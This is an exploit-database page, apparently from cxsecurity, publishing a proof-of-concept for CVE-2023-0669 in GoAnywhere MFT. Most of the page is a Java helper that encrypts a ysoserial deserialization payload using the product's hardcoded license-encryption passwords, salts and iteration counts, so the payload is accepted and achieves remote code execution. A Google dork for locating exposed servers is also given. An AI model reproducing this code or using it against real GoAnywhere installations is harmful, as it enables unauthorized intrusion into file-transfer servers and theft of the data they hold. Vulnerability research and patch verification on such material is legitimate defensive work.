Goanywhere Encryption Helper 7.1.1 Remote Code Execution

2023.04.10
Credit: Youssef Muhammad
Risk: High
Local: No
Remote: Yes
CVE: CVE-2023-0669
CWE: N/A
Dork: title:"GoAnywhere"

// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) // Google Dork: title:"GoAnywhere" // Date: 3/26/2023 // Exploit Author: Youssef Muhammad // Vendor Homepage: https://www.goanywhere.com/ // Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0 // Version: > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux // CVE : CVE-2023-0669 // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64; import javax.crypto.Cipher; import java.nio.charset.StandardCharsets; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.nio.file.Files; import java.nio.file.Paths; public class CVE_2023_0669_helper { static String ALGORITHM = "AES/CBC/PKCS5Padding"; static byte[] KEY = new byte[30]; static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8); public static void main(String[] args) throws Exception { if (args.length != 2) { System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>"); System.exit(1); } String filePath = args[0]; String version = args[1]; byte[] fileContent = Files.readAllBytes(Paths.get(filePath)); String encryptedContent = encrypt(fileContent, version); System.out.println(encryptedContent); } public static String encrypt(byte[] data, String version) throws Exception { Cipher cipher = Cipher.getInstance(ALGORITHM); KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue(); SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES"); IvParameterSpec ivSpec = new IvParameterSpec(IV); cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec); byte[] encryptedObject = cipher.doFinal(data); String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject); String v = (version.equals("2")) ? "$2" : ""; bundle += v; return bundle; } private static byte[] getInitializationValue() throws Exception { // Version 1 Encryption String param1 = "go@nywhereLicenseP@$$wrd"; byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded(); } private static byte[] getInitializationValueV2() throws Exception { // Version 2 Encryption String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R"; byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded(); } }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top